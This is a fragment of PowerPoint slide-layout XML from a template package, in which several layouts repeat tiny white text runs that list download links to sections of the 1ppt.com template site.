              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout180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80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80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80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8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81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81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81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81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81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81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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout181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81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81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81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8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82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82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82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82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82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82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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout182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82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82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82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8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83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83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83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83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83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83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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
